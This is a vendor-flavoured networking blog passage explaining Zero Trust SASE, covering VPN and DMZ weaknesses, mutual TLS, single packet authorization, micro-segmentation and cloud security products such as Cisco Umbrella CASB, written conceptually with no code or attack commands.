
B) – SASE Best Practices

As a best practice with Cisco Umbrella, you can start with the pre-built identifiers and create custom dictionaries to monitor your organization’s specific keywords and phrases. Then, you can create specific rules based on users, groups, devices, and locations for which you want to watch data. Finally, you can choose which destination and apps you like to monitor; many organizations choose only to monitor when creating DLP rules and then enable block over time. 

C) – Cisco Umbrella CASB starting points

Consider the following recommendations when starting a project that consists of CASB functionality. First, discover sanctioned and unsanctioned cloud services and then access the cloud risk based on cloud service categories. This includes all cloud services and cloud plug-ins. Once this information has been gained, it can be measured, along with risk. This can then be compared to the organization’s risk tolerance. 

Next, identify and protect sensitive information. Once you find all sensitive information in the cloud, you can classify it and then apply controls to control its movement, such as DLP. For example, additional protections can be used if sensitive data is moved from the cloud services to a local unmanaged laptop.

D) – SASE Detect and Mitigate Threats.

You can access the user’s behavior and any deviations that may signal out-of-normal activity. The CASB is one of many solutions that should be used here—more mature products with advanced detection, such as Splunk User Behavior Analytics (UBA). For example, trust decreases once a significant deviation from the baseline is noticed. You could implement step-down privileges or more extreme courses, therefore changing the level of access. In addition, it would be helpful to track all data’s movement and detect and eliminate Malware. And then have an implementation strategy for remediation.

Summary: Cisco Umbrella SASE

In today’s digital landscape, businesses are rapidly adopting cloud technologies to drive innovation and enhance productivity. However, this shift towards the cloud also introduces new security challenges. Enter Cisco Umbrella CASB, a comprehensive cloud access security broker solution that empowers organizations to safely navigate their cloud journey while ensuring data protection and compliance.

Understanding Cisco Umbrella CASB

Cisco Umbrella CASB is a robust platform that provides visibility, control, and protection across all cloud applications and services utilized by an organization. It offers a centralized console to manage cloud access, enforce security policies, and detect potential threats. With its advanced capabilities, Cisco Umbrella CASB enables businesses to embrace the cloud securely.

Key Features and Benefits

a) Cloud Application Visibility: Cisco Umbrella CASB offers deep visibility into cloud applications and services being used within an organization. It provides valuable insights into user activities, data transfers, and potential risks, allowing administrators to make informed decisions.

b) Policy Enforcement: With granular policy controls, Cisco Umbrella CASB enables organizations to define and enforce security policies tailored to their specific needs. It ensures that data is accessed, shared, and stored within the cloud according to predefined guidelines, reducing the risk of data breaches or unauthorized access.

c) Threat Detection and Response: By leveraging advanced threat intelligence and machine learning, Cisco Umbrella CASB proactively identifies and mitigates potential threats within cloud environments. It alerts administrators about anomalous activities, suspicious behavior, or policy violations, enabling swift incident response.

Seamless Integration and Scalability

Cisco Umbrella CASB seamlessly integrates with existing security infrastructure, including firewalls, proxies, and endpoint security solutions. This integration allows businesses to leverage their existing investments while extending comprehensive cloud security capabilities. Additionally, the solution scales effortlessly as organizations expand their cloud footprint, ensuring continuous protection.

Real-World Use Cases

a) Data Loss Prevention: Cisco Umbrella CASB helps prevent sensitive data leakage by monitoring and controlling data transfers within cloud applications. It enables organizations to set up policies that restrict the sharing of confidential information or personally identifiable data, reducing the risk of data loss incidents.

b) Compliance and Governance: With its robust auditing and reporting capabilities, Cisco Umbrella CASB assists organizations in meeting regulatory compliance requirements. It provides detailed logs and insights into user activities, ensuring transparency and accountability in cloud usage.

Conclusion

Cisco Umbrella CASB is a game-changer in the realm of cloud security. Its comprehensive feature set, seamless integration, and scalability make it an invaluable asset for organizations aiming to secure their cloud journey. By harnessing the power of Cisco Umbrella CASB, businesses can unlock the true potential of the cloud while safeguarding their critical assets and maintaining compliance.

zero trust network design

Zero Trust SASE

by Publications

Zero Trust SASE

In today's digital age, where remote work and cloud-based applications are becoming the norm, traditional network security measures are no longer sufficient to protect sensitive data. Enter Zero Trust Secure Access Service Edge (SASE), a revolutionary approach that combines the principles of Zero Trust security with the flexibility and scalability of cloud-based architectures. In this blog post, we will delve into the concept of Zero Trust SASE and explore its benefits and implications for the future of network security.

Zero Trust is a security model that operates on "never trust, always verify." It assumes that no user or device should be granted automatic trust within a network, whether inside or outside the perimeter. Instead, every user, device, and application must be continuously authenticated and authorized based on various contextual factors, such as user behavior, device health, and location.

SASE is a comprehensive security framework that combines networking and security capabilities into a single cloud-based service. It aims to simplify and unify network security by providing secure access to applications and data, regardless of the user's location or device.

SASE integrates various security functions, such as secure web gateways, cloud access security brokers, and data loss prevention, into a single service, reducing complexity and improving overall security posture.

Matt Conran

Highlights: Zero Trust SASE

Innovative Security Framework

Zero Trust SASE is an innovative security framework that combines Zero Trust principles with Secure Access Service Edge (SASE) architecture. It emphasizes continuous verification and validation of every user, device, and network resource attempting to access an organization’s network, regardless of location. By adopting a zero-trust approach, organizations can enhance security by eliminating the assumption of trust and implementing stricter access controls.

1. Note: Zero Trust SASE is built upon several key components to create a robust and comprehensive security framework. These components include identity and access management, multi-factor authentication, network segmentation, encryption, continuous monitoring, and threat intelligence integration. Each element is crucial in strengthening network security and protecting against evolving cyber threats.

2. Note: Both SASE and ZTNA are essential components of modern security architecture. However, they are two different solutions. SASE provides a comprehensive, multi-faceted security framework, while ZTNA is a more narrowly focused model focused on limiting resource access, which is a part of SAS

**Challenge: The Lag in Security** 

Today’s digital transformation and strategy initiatives require speed and agility in I.T. However, there is a lag, and that lag is with security. Security can either hold them back or not align with the fluidity needed for agility. As a result, we have decreased an organization’s security posture, which poses a risk that needs to be managed. We have a lot to deal with, such as the rise in phishing attacks, mobile malware, fake public Wi-Fi networks, malicious apps, and data leaks. Therefore, we have new requirements that SASE can help with.

Zero Trust Security

Zero Trust Security is a paradigm shift from the traditional perimeter-based security model. It operates on the principle of “never trust, always verify.” Unlike the old approach, where users and devices were granted broad access once inside the network, Zero Trust Security treats every user, device, and network segment as potentially untrusted. This enhanced approach minimizes the risk of unauthorized access and lateral movement within the network.

Continuous Verification & Strict Access Control

Zero Trust is a security model that operates on the principle of never trusting any network or user by default. It emphasizes continuous verification and strict access control to mitigate potential threats. With Zero Trust, organizations adopt a granular approach to security, ensuring that every user, device, and application is authenticated and authorized before accessing any resources.

Challenge: Large Segments with VLANs

Example Technology: Network Endpoint Groups

**Understanding Micro-segmentation**

Microsegmentation is a critical strategy in modern network management, providing a method to improve security by dividing a network into smaller, isolated segments. This approach ensures that any potential security breaches are contained and do not spread across the network. In the context of Google Cloud, NEGs can be effectively used to implement microsegmentation. By creating smaller, controlled segments, you can enforce security policies more rigorously, reducing the risk of unauthorized access and enhancing the overall security posture of your applications.


network endpoint groups

**The SASE Concept**

Gartner coined the SASE concept after seeing a pattern emerge in cloud and SD-WAN projects where full security integration was needed. We now refer to SASE as a framework and a security best practice. SASE leverages multiple security services into a framework approach.

The idea of SASE was not far from what we already did, which was integrating numerous security solutions into a stack that ensured a comprehensive, layered, secure access solution. By calling it a SASE framework, the approach to a complete solution somehow felt more focused than what the industry recognized as a best security practice.

The security infrastructure and decisions must become continuous and adaptive, not static, that formed the basis of traditional security methods. Consequently, we must enable real-time decisions that balance risk, trust, and opportunity. As a result, security has beyond a simple access control list (ACL) and zone-based segmentation based on VLANs. In reality, no network point acts as an anchor for security.

Example Technology: IPv6 Access Lists 

Many current network security designs and technologies were not designed to handle all the traffic and security threats we face today. This has forced many to adopt multiple-point products to address the different requirements. Remember that for every point product, there is an architecture to deploy, a set of policies to configure, and a bunch of logs to analyze. I find correlating logs across multiple-point product solutions used in different domains hard.

For example, a diverse team may operate the secure web gateways (SWG) to that of the virtual private network (VPN) appliances. It could be the case that these teams work in silos and are in different locations.

Zero Trust SASE requirements:

  1. Information hiding: SASE requires clients to be authenticated and authorized before accessing protected assets, regardless of whether the connection is inside or outside the network perimeter.
  2. Mutually encrypted connections: SASE uses the full TLS standard to provide mutual, two-way cryptographic authentication. Mutual TLS provides this and goes one step further to authenticate the client.
  3. Need to know the access model: SASE employs a need-to-know access model. As a result, SASE permits the requesting client to view only the resources appropriate to the assigned policy.
  4. Dynamic access control: SASE deploys a dynamic firewall that starts with one rule – deny all. Then, requested communication is dynamically inserted into the firewall, providing an active firewall security policy instead of static configurations.
  5. Identity-driven access control: SASE provides adaptive, identity-aware, precision access for those seeking more precise access and session control to applications on-premises and in the cloud.

Starting Zero Trust

Endpoint Security 

Understanding ARP (Address Resolution Protocol)

ARP is a vital network communication protocol that maps an IP address to a physical MAC address. By maintaining an ARP table, endpoints can efficiently communicate within a network. 

Routes and gateways act as the pathways for data transmission between networks. Safeguarding these routes is crucial to ensure network integrity. We will discuss the significance of secure routing protocols, such as OSPF and BGP, and how they contribute to endpoint security. 

Netstat, short for Network Statistics, is a powerful command-line tool providing detailed information about network connections and statistics. This section will highlight the importance of using netstat for monitoring endpoint security. From identifying active connections to detecting suspicious activities, netstat empowers administrators to protect their networks proactively.

Understanding SELinux

SELinux is a robust security framework built into the Linux kernel. It provides fine-grained access control policies and mandatory access controls (MAC) to enforce system-wide security policies. Unlike traditional Linux discretionary access controls (DAC), SELinux operates on the principle of least privilege, ensuring that only authorized actions are allowed.

Organizations can establish a robust security posture for their endpoints by combining SELinux with zero trust principles. SELinux provides granular control over system resources, enabling administrators to define strict policies based on user roles, processes, and system components. This ensures that even if an endpoint is compromised, the attacker’s lateral movement and potential damage are significantly limited.

### Understanding Authentication in Vault

Authentication is the process of verifying the identity of a user or system. In Vault, this is achieved through various authentication methods such as tokens, AppRole, LDAP, GitHub, and more. Each method serves different use cases, allowing flexibility and scalability in managing access. Vault ensures that only authenticated users can access sensitive data, thus mitigating the risk of unauthorized access.

### The Role of Authorization

While authentication verifies identity, authorization determines what authenticated users can do. Vault uses policies to define the actions that users and applications can perform. These policies are written in HashiCorp Configuration Language (HCL) or JSON, and they provide a fine-grained control over access to secrets. By segregating duties and defining clear access levels, Vault helps prevent privilege escalation and minimizes the risk of data exposure.

### Managing Identity with Vault

Vault’s identity management capabilities allow organizations to unify identities across various platforms. By integrating with identity providers and managing roles and entities, Vault simplifies user management and enhances security. This integration ensures that user credentials are consistently verified and that access rights are updated as roles change, reducing the risk of stale credentials being exploited.

Vault

Use Case: WAN Edge Performance Routing

SASE & Performance-Based Routing

Performance-based routing is a dynamic routing technique that selects the best path for network traffic based on real-time performance metrics. Traditional routing protocols often follow static routes, leading to suboptimal network performance. However, performance-based routing leverages latency, packet loss, and bandwidth availability metrics to make informed routing decisions. By continuously evaluating these metrics, networks can adapt and reroute traffic to ensure optimal performance.

Google Cloud & IAP

**Understanding the Basics of IAP**

At its core, Identity-Aware Proxy is a security service that acts as a gatekeeper for applications and resources. It ensures that only authenticated and authorized users can access specific web applications hosted on cloud platforms. Unlike traditional security models that rely on network-level access controls, IAP takes a user-centric approach, verifying identity and context before granting access. This method not only strengthens security but also simplifies access management across distributed environments.

**The Role of IAP in Google Cloud**

Google Cloud offers a versatile and integrated approach to using IAP, making it an attractive option for organizations leveraging cloud services. With Google Cloud’s IAP, businesses can secure their web applications and VMs without the need for traditional VPNs or complex network configurations. This section will delve into how Google Cloud implements IAP, highlighting its seamless integration with other Google Cloud services and the ease with which it can be deployed. By utilizing Google Cloud’s IAP, businesses can streamline their security operations and focus on delivering value to their customers.

**Benefits of Using Identity-Aware Proxy**

The advantages of implementing IAP are manifold. Firstly, it enhances security by enforcing granular access controls based on user identity and context. This reduces the risk of unauthorized access and potential data breaches. Secondly, IAP simplifies the user experience by enabling single sign-on (SSO) capabilities, allowing users to access multiple applications with a single set of credentials. Additionally, IAP’s integration with existing identity providers ensures that businesses can maintain a consistent security policy across their entire IT ecosystem.

Identity aware proxy

Related: For pre-information, you may find the following helpful:

  1. SD-WAN SASE
  2. SASE Model
  3. SASE Solution
  4. Cisco Secure Firewall
  5. SASE Definition

Zero Trust SASE

Many challenges to existing networks and infrastructure create big security holes and decrease security posture. In reality, several I.T. components give the entity more access than required. We have considerable security flaws with using I.P. addresses as a security anchor and static locations; the virtual private networks (VPN) and demilitarized zone (DMZ) architectures used to establish access are often configured to allow excessive implicit trust.  

##Challenge 1: The issue with a DMZ

The DMZ is the neutral network between the Internet and your organization’s private network. It’s protected by a front-end firewall that limits Internet traffic to specific systems within its zone. The DMZ can have a significant impact on security if not appropriately protected. Remote access technologies such as VPN or RDP, often located in the DMZ, have become common targets of cyberattacks. One of the main issues I see with the DMZ is that the bad actors know it’s there. It may be secured, but it’s visible.

##Challenge 2: The issue with the VPN

In basic terms, a VPN provides an encrypted server and hides your IP address. However, the VPN does not secure users when they land on a network segment and is based on coarse-grained access control where the user has access to entire network segments and subnets. Traditionally, once you are on a segment, there will be no intra-filtering on that segment. That means all users in that segment need the same security level and access to the same systems, but that is not always the case. 

GRE without IPsec GRE with IPsec

##Challenge 3: permissive network access

VPNs generally provide broad, overly permissive network access with only fundamental access control limits based on subnet ranges. So, the traditional VPN provides overly permissive access and security based on I.P. subnets. Note: The issue with VLAN-based segmentation is large broadcast domains with free-for-all access. This represents a larger attack surface where lateral movements can take place. Below is a standard VLAN-based network running Spanning Tree Protocol ( STP ).

## Challenge 4: Security-based on trust

Much of the non-zero trust security architecture is based on trust, which bad actors abuse. On the other hand, examining a SASE overview includes zero trust networking and remote access as one of its components, which can adaptively offer the appropriate trust required at the time and nothing more. It is like providing a narrow segmentation based on many contextual parameters continuously assessed for risk to ensure the users are who they are and that the entities, either internal or external to the network, are doing what they are supposed to do.

**Removes excessive trust**

A core feature of SASE and Zero Trust is that it removes the excessive trust once required to allow entities to connect and collaborate. Within a zero-trust environment, our implicit trust in traditional networks is replaced with explicit identity-based trust with a default denial. With an identity-based trust solution, we are not just looking at IP addresses to determine trust levels. After all, they are just binary, deemed a secure private or a less trustworthy public. This assumption is where all of our problems started. They are just ones and zeros.

## Challenge 5: IP for Location and Identity 

To improve your security posture, it would be best to stop relying primarily on IP addresses and network locations as a proxy for trust. We have been doing this for decades. There is minimal context in placing a policy with legacy constructs. To determine the trust of a requesting party, we need to examine multiple contextual aspects, not just IP addresses.

And the contextual aspects are continuously assessed for security posture. This is a much better way to manage risk and allows you to look at the entire picture before deciding to enter the network or access a resource.

Example: Firewall Tagging

Firewall tags

1) SASE: First attempt to 

Organizations have adopted different security technologies to combat these changes and include them in their security stack. Many of the security technologies are cloud-based services. Some of these services include the cloud-based secure web gateway (SWG), content delivery network [CDN], and web application firewall [WAF].

A secure web gateway (SWG) protects users from web-based threats and applies and enforces acceptable corporate use policies. A content delivery network (CDN) is a geographically distributed group of servers that works together to deliver Internet content quickly. A WAF, or web application firewall, helps protect web applications by filtering and monitoring HTTP traffic between them and the Internet.

The data center is the center of the universe.

However, even with these welcomed additions to security, the general trend was that the data center is still the center of most enterprise networks and network security architectures. Let’s face it: These designs are becoming ineffective and cumbersome with the rise of cloud and mobile technology. Traffic patterns have changed considerably, and so has the application logic.

2) SASE: Second attempt to

The next attempt was for a converged cloud-delivered secure access service edge (SASE) to accomplish this shift in the landscape. And that is what SASE architecture does. As you know, the SASE architecture relies on multiple contextual aspects to establish and adapt trust for application-level access. It does not concern itself with significant VLANs and broad-level access or believe that the data center is the center of the universe. Instead, the SASE architecture is often based on PoPs, where each PoP acts as the center of the universe.

The SASE definition and its components are a transformational architecture that can combat many of these discussed challenges. A SASE solution converges networking and security services into one unified, cloud-delivered solution that includes the following core capabilities of sase.

From the network side of things: SASE in networking:

    1. Software-defined wide area network (SD-WAN)
    2. Virtual private network (VPN)
    3. Zero Trust Network ZTN
    4. Quality of service (QoS)
    5. Software-defined perimeter (SDP)

Example SDP Technology: VPC Service Controls

VPC Security Controls VPC Service Controls

From the security side of things, SASE capabilities in security:

    1. Firewall as a service (FWaaS)
    2. Domain Name System (DNS) security
    3. Threat prevention
    4. Secure web gateways
    5. Data loss prevention (DLP)
    6. Cloud access security broker (CASB)

Example Technology: The Web Security Scanner

security web scanner

SASE changes the focal point to the identity of the user and device. With traditional network design, we have the on-premises data center, considered the universe’s center. With SASE, that architecture changes this to match today’s environment and moves the perimeter to the actual user, devices, or PoP with some SASE designs. In contrast to traditional enterprise networks and security architectures, the internal data center is the focal point for access. 

Example Product: Cisco Meraki

### What is Cisco Meraki?

Cisco Meraki is a suite of cloud-managed IT solutions that include wireless, switching, security, EMM (Enterprise Mobility Management), and security cameras, all centrally managed from the web. The Meraki dashboard provides powerful and intuitive tools to manage your entire network from a single pane of glass. This holistic approach ensures that businesses can maintain robust security protocols without compromising on ease of management.

### Key Features of Cisco Meraki

#### Cloud-Based Management

One of the standout features of Cisco Meraki is its cloud-based management. This allows for real-time monitoring, configuration, and troubleshooting from anywhere in the world. With automatic updates and seamless scalability, businesses can ensure their network is always up-to-date and secure.

#### Advanced Security Features

Cisco Meraki offers a range of advanced security features designed to protect your network from various threats. These include intrusion detection and prevention systems (IDS/IPS), advanced malware protection (AMP), and content filtering. By leveraging these tools, businesses can safeguard their data and maintain the integrity of their network.

#### Simplified Deployment

Deploying a traditional network can be a complex and time-consuming task. Cisco Meraki simplifies this process with zero-touch provisioning, which allows devices to be pre-configured and managed remotely. This reduces the need for on-site technical expertise and accelerates the deployment process.

### Benefits of Using Cisco Meraki for Network Security

#### Centralized Control

The centralized control offered by the Meraki dashboard enables IT teams to manage multiple sites from a single interface. This not only streamlines operations but also ensures consistent security policies across all locations.

#### Scalability

As businesses grow, their network needs evolve. Cisco Meraki’s scalable solutions allow for easy expansion without the need for significant infrastructure changes. This flexibility ensures that businesses can adapt to changing demands without compromising on security.

#### Cost Efficiency

By reducing the need for on-site hardware and simplifying management, Cisco Meraki can lead to significant cost savings. Additionally, the reduced need for technical expertise can lower operational costs, making it an attractive option for businesses looking to optimize their IT budget.

VPN Security Scenario 

  • Challenge: Traditional remote access VPNs

Remote access VPNs are primarily built to allow users outside the perimeter firewall to access resources inside the perimeter firewall. As a result, they often follow a hub-and-spoke architecture, with users connected by tunnels of various lengths depending on their distance from the data center. Traditional VPNs introduce a lot of complexity. For example, what do you do if you have multiple sites where users need to access applications? In this scenario, the cost of management would be high. 

  • Challenge: Tunnel based on I.P

What’s happening here is that the tunnel creates an extension between the client device and the application location. The tunnel is based on IP addresses on the client device and the remote application. Now that there is I.P. connectivity between the client and the application, the network where the application is located is extended to the client.

However, the client might not sit in an insecure hotel room or from home. These may not be sufficiently protected, and such locations should be considered insecure. The traditional VPN has many issues to deal with. It is user-initiated, and policy often permits split-tunnel VPNs without Internet or cloud traffic inspection.

SASE: A zero-trust VPN solution

A SASE solution encompasses VPN services and enhances the capabilities of operating in cloud-based infrastructure to route traffic. On the other hand, with SASE, the client connects to the SASE PoP, which carries out security checks and forwards the request to the application. A SASE design still allows clients to access the application, but they can only access that specific application and nothing more, like a stripped-down VLAN known as a micro-segmentation.

Restricting Lateral Movements

Clients must pass security controls, and no broad-level access is susceptible to lateral movements. Access control is based on an allowlist rather than the traditional blocklist rule. Also, other variables present in the request context are used instead of using I.P. addresses as the client identifier. As a result, the application is now the access path, not the network.

Simplified Management & Policy Control

So, no matter what type of VPN services you use, the SASE provides a unified cloud to connect to instead of backhauling to a VPN gateway—simplifying management and policy control. Well-established technologies such as VPN, secure web gateway, and firewall are being reviewed and reassessed in Zero Trust remote access solutions as organizations revisit approaches that have been in place for over a decade. 

A recommendation: SASE and SD-WAN

The value of SD-WAN is high. However, it also brings many challenges, including new security risks. In some of my consultancies, I have seen unreliable performance and increased complexity due to the need for multiple overlays. Also, these overlays need to terminate somewhere, and this will be at a hub site.  However, when combined with SASE, the SD-WAN edge devices can be connected to a cloud-based infrastructure rather than the physical SD-WAN hubs. This brings the value of interconnectivity between branch sites without the complexity of deploying or managing physical Hub sites.

Zero Trust SASE: Vendor considerations

SASE features converge various individual components into one connected, cloud-delivered service, making it easy to control policies and behaviors. The SASE architecture is often based on a PoP design. When examining the SASE vendor, the vendor’s PoP layout should be geographically diverse, with worldwide entry and exit points. 

Also, considerations should be made regarding the vendor’s edge/physical infrastructure providers or colocation facilities. We can change your security posture, but we can’t change the speed of light and the laws of physics.

Consider how the SASE vendor routes traffic in their PoP fabric. Route optimization should be performed at each PoP. Some route optimizations are for high availability, while others are for performance. Does the vendor offer cold-potato or hot-potato routing? The cold-potato routing means bringing the end-user device into the provider’s network as soon as possible. On the other hand, “hot-potato routing” means the end user’s traffic traverses more of the public Internet.

The following is a list of considerations to review when discussing SASE with your preferred cybersecurity vendor:

A. Zero Trust SASE requirements: Information hiding:

Secure access service requires clients to be authenticated and authorized before accessing protected assets, regardless of whether the connection is inside or outside the network perimeter. Then, real-time encrypted connections are created between the requesting client and the protected asset. As a result, all SASE-protected servers and services are hidden from all unauthorized network queries and scan attempts.

You can’t attack what you can’t see.

The base for network security started by limiting visibility – you cannot attack what you cannot see. Public and private IP addresses range from separate networks. This was the biggest mistake we ever made as I.P. addresses are just binary, whether they are deemed public or private. If a host were assigned a public address and wanted to communicate with a host with a private address, it would need to go through a network address translation (NAT) device and have a permit policy set.

Understanding Port Knocking

Port knocking is a technique that enables secure and controlled access to network services. Traditionally, network ports are open and accessible, leaving systems vulnerable to unauthorized access. However, with port knocking, access to specific ports is only granted after a predefined sequence of connection attempts is made to other closed ports. This sequence acts as a virtual “knock” on the door, allowing authorized users to gain access while keeping malicious actors at bay.

To fully comprehend port knocking, let’s explore its inner mechanics. When users wish to access a specific service, they must first send connection attempts to a series of closed ports in a particular order. This sequence acts as a secret handshake, notifying the server that the user is authorized. Once the correct sequence is detected, the server dynamically opens the desired port, granting access to the requested service. It’s like having a hidden key that unlocks the door to a secure sanctuary.

Security based on the visibility

Network address translation is mapping an IP address space into another by modifying network address information in the IP header of packets while they are in transit across a traffic routing device. Limiting visibility this way works to a degree, but we cannot ignore the fact that a) if you have someone’s IP address, you can reach them, and b) if a port is open, you can potentially connect to it.

Therefore, the traditional security method can open your network wide for compromise, especially when bad actors have all the tools. However, finding, downloading, and running a port scanning tool is not hard.

“Nmap,” for Network Mapper, is the most widely used port scanning tool. Nmap works by checking a network for hosts and services. Once found, the software platform sends information to those hosts and services, responding. Nmap reads and interprets the response and uses the data to create a network map.

Example: Understanding Lynis

Lynis is an open-source security auditing tool for discovering vulnerabilities on Unix, Linux, and macOS systems. It comprehensively analyzes the system’s configuration and provides valuable insights into potential security weaknesses. By scanning the system against a vast database of known security issues, Lynis helps identify areas for improvement.

Lynis runs a series of tests and audits on the target system. It examines various aspects, including file permissions, system settings, available software packages, and network configurations. Lynis generates a detailed report highlighting any identified vulnerabilities or potential security gaps by analyzing these factors. This report becomes a valuable resource for system administrators and security professionals to take necessary actions and mitigate risks.

Example: Single Packet Authorization

Zero-trust network security hides information and infrastructure through lightweight protocols such as single-packet authorization (SPA). No internal IP addresses or DNS information is shown, creating an invisible network. As a result, we have zero visibility and connectivity, only establishing connectivity after clients prove they can be trusted to allow legitimate traffic. Now, we can have various protected assets hidden regardless of location: on-premise, public or private clouds, a DMZ, or a server on the internal LAN, in keeping with today’s hybrid environment.

Default-drop dynamic firewall

This approach mitigates denial-of-service attacks. Anything internet-facing is reachable on the public Internet and, therefore, susceptible to bandwidth and server denial-of-service attacks. The default-drop firewall is deployed, with no visible presence to unauthorized users. Only good packets are allowed. Single packet authorization (SPA) also provides for attack detection.

If a host receives anything other than a valid SPA packet or similar construct, it views that packet as part of a threat. The first packet to a service must be a valid SPA packet or similar security construct.

If it receives another packet type, it views this as an attack, which is helpful for bad packet detection. Therefore, SPA can determine an attack based on a single malicious packet, a highly effective way to detect network-based attacks. Thus, external network and cross-domain attacks are detected.

B. Zero Trust SASE architecture requirements: Mutually encrypted connections:

Transport Layer Security ( TLS ) is an encryption protocol that protects data when it moves between computers. When two computers send data, they agree to encrypt the information in a way they both understand. Transport layer security (TLS) was designed to provide mutual device authentication before enabling confidential communication over the public Internet. However, the standard TLS configuration validates that the client is connected to a trusted entity. So, typical TLS adoptions authenticate servers to clients, not clients to servers. 

Mutually encrypted connections

SASE uses the full TLS standard to provide mutual, two-way cryptographic authentication. Mutual TLS provides this and goes one step further to authenticate the client. Mutual TLS connections are set up between all components in the SASE architecture. Mutual Transport Layer Security (mTLS) establishes an encrypted TLS connection in which both parties use X. 509 digital certificates to authenticate each other.

MTLS can help mitigate the risk of moving services to the cloud and prevent malicious third parties from imitating genuine apps. This offers robust device and user authentication, as connections from unauthorized users and devices are mitigated. Secondly, forged certificates, which are attacks aimed at credential theft, are disallowed. This will reduce impersonation attacks, where a bad actor can forge a certificate from a compromised authority.

C. Need to know the access model: Zero Trust SASE architecture requirements

Thirdly, SASE employs a need-to-know access model. As a result, SASE permits the requesting client to view only the resources appropriate to the assigned policy. Users are associated with their devices, which are validated based on policy. Only connections to the specifically requested service are enabled, and no other connection is allowed to any other service. SASE provides additional information, such as who made the connection, from what device, and to what service.

This gives you complete visibility into all the established connections, which is hard to do without an IP-based solution. So now we have a contextual aspect of determining the level of risk. As a result, it makes forensics easier. The SASE architecture only accepts good packets; bad packets can be analyzed and tracked for forensic activities.

Key Point: Device validation

Secondly, it enforces device validation, which helps against threats from unauthorized devices. We can examine the requesting user and perform device validation. Device validation ensures that the machine runs on trusted hardware and is used by the appropriate user.

Finally, suppose a device becomes compromised. In that case, lateral movements are entirely locked down, as a user is only allowed access to the resource it is authorized to. Or they could be placed into a sandbox zone where human approval must intervene and assess the situation.

D. Dynamic access control: Zero Trust SASE architecture requirements

This traditional type of firewall is limited in scope as it cannot express or enforce rules based on identity information, which you can with zero trust identity. Attempting to model identity-centric control with the limitations of the 5-tuple, SASE can be used alongside traditional firewalls and take over the network access control enforcement that we try to do with conventional firewalls. SASE deploys a dynamic firewall that starts with one rule – deny all.

Then, requested communication is dynamically inserted into the firewall, providing an active firewall security policy instead of static configurations. For example, every packet hitting the firewall is inspected with a single packet authentication (SPA) and then quickly verified for a connection request. 

Key Point: Dynamic firewall

Once established, the firewall is closed again. Therefore, the firewall is dynamically opened only for a specific period. The connections made are not seen by rogues outside the network or the user domain within the network. Allows dynamic, membership-based enclaves that prevent network-based attacks.

The SASE dynamically binds users to devices, enabling those users to access protected resources by dynamically creating and removing firewall rules.  Access to protected resources is facilitated by dynamically creating and removing inbound and outbound access rules. Therefore, we now have more precise access control mechanisms and considerably reduced firewall rules.

**Micro perimeter**

Traditional applications were grouped into VLANs whether they offered similar services or not. Everything on that VLAN was reachable. The VLAN was a performance construct to break up broadcast domains, but it was pushed into the security world and never meant to be there. 

Its prime use was to increase performance. However, it was used for security in what we know as traditional zone-based networking. The segments in zone-based networks are too large and often have different devices with different security levels and requirements.

Key Points:

A. Logical-access boundary: SASE enables this by creating a logical access boundary encompassing a user and an application or set of applications. And that is it—nothing more and nothing less. Therefore, we have many virtual micro perimeters specific to the business instead of the traditional main inside/outside perimeter. Virtual perimeters allow you to grant access to the particular application, not the underlying network or subnet.

B. Reduce the attack surface: The smaller micro perimeters reduce the attack surface and limit the need for excessive access to all ports and protocols or all applications. These individualized “virtual perimeters” encompass only the user, the device, and the application. They are created and specific to the session and then closed again when it is over or if the risk level changes and the device or user needs to perform setup authentication.

C. Software-defined perimeter (SDP): SASE only grants access to the specific application at an application layer. The SDP part of SASE now controls which devices and applications can access distinctive services at an application level. Permitted by a policy granted by the SDP part of SASE, machines can only access particular hosts and services and cannot access network segments and subnets.

**Reduced: Broad Network Access**

Broad network access is eliminated, reducing the attack surface to an absolute minimum. SDP provides a fully encrypted application communication path. However, the binding application permits only authorized applications to communicate through the established encrypted tunnels, thus blocking all other applications from using them. This creates a dynamic perimeter around the application, including connected users and devices. Furthermore, it offers a narrow access path—reducing the attack surface to an absolute minimum.

E. Identity-driven access control: Zero Trust SASE architecture requirements

Traditional network solutions provide coarse-grained network segmentation based on someone’s IP address. However, someone’s IP address is not a good security hook and does not provide much information about user identity. SASE enables the creation of microsegmentation based on user-defined controls, allowing a 1-to-1 mapping, unlike with a VLAN, where there is the potential to see everything within that VLAN.

Identity-aware access: SASE provides adaptive, identity-aware, precision access for those seeking more precise access and session control to applications on-premises and in the cloud. Access policies are primarily based on user, device, and application identities. The procedure is applied independent of the user’s physical location or the device’s I.P. address, except where it prohibits it. This brings a lot more context to policy application. Therefore, if a bad actor gains access to one segment in the zone, they are prevented from compromising any other network resource.

Detecting Authentication Failures in Logs:

Syslog: Useful Security Technology

Syslog, short for System Logging Protocol, is a standard for message logging within computer systems. It collects various log entries from different sources and stores them in a centralized location. Syslog is a valuable resource for detecting security events as it captures information about system activities, errors, and warnings.

Auth.log is a specific type of log file that focuses on authentication-related events in Unix-based operating systems. It records user logins, failed login attempts, password changes, and other authentication activities. Analyzing auth.log can provide vital insights into potential security breaches, such as brute-force attacks or suspicious login patterns.

Now that we understand the importance of syslog and auth.log, let’s delve into some effective techniques for detecting security events in these files. One widely used approach is log monitoring, where automated tools analyze log entries in real time, flagging suspicious or malicious activities. Another technique is log correlation, which involves correlating events across multiple log sources to identify complex attack patterns.

Summary: Zero Trust SASE

Traditional security measures are no longer sufficient in today’s rapidly evolving digital landscape, where remote work and cloud-based applications have become the norm. Enter Zero Trust Secure Access Service Edge (SASE), a revolutionary approach that combines network security and wide-area networking into a unified framework. In this blog post, we explored the concept of Zero Trust SASE and its implications for the future of cybersecurity.

Understanding Zero Trust

Zero Trust is a security framework that operates under the “never trust, always verify.” It assumes no user or device should be inherently trusted, regardless of location or network. Instead, Zero Trust focuses on continuously verifying and validating identity, access, and security parameters before granting any level of access.

The Evolution of SASE

Secure Access Service Edge (SASE) represents a convergence of network security and wide-area networking capabilities. It combines security services, such as secure web gateways, firewall-as-a-service, and data loss prevention, with networking functionalities like software-defined wide-area networking (SD-WAN) and cloud-native architecture. SASE aims to provide comprehensive security and networking services in a unified, cloud-delivered model.

The Benefits of Zero Trust SASE:

a) Enhanced Security: Zero Trust SASE brings a holistic approach to security, ensuring that every user and device is continuously authenticated and authorized. This reduces the risk of unauthorized access and mitigates potential threats.

b) Improved Performance: By leveraging cloud-native architecture and SD-WAN capabilities, Zero Trust SASE optimizes network traffic, reduces latency, and enhances overall performance.

c) Simplified Management: A unified security and networking framework can streamline organizations’ management processes, reduce complexity, and achieve better visibility and control over their entire network infrastructure.

Implementing Zero Trust SASE

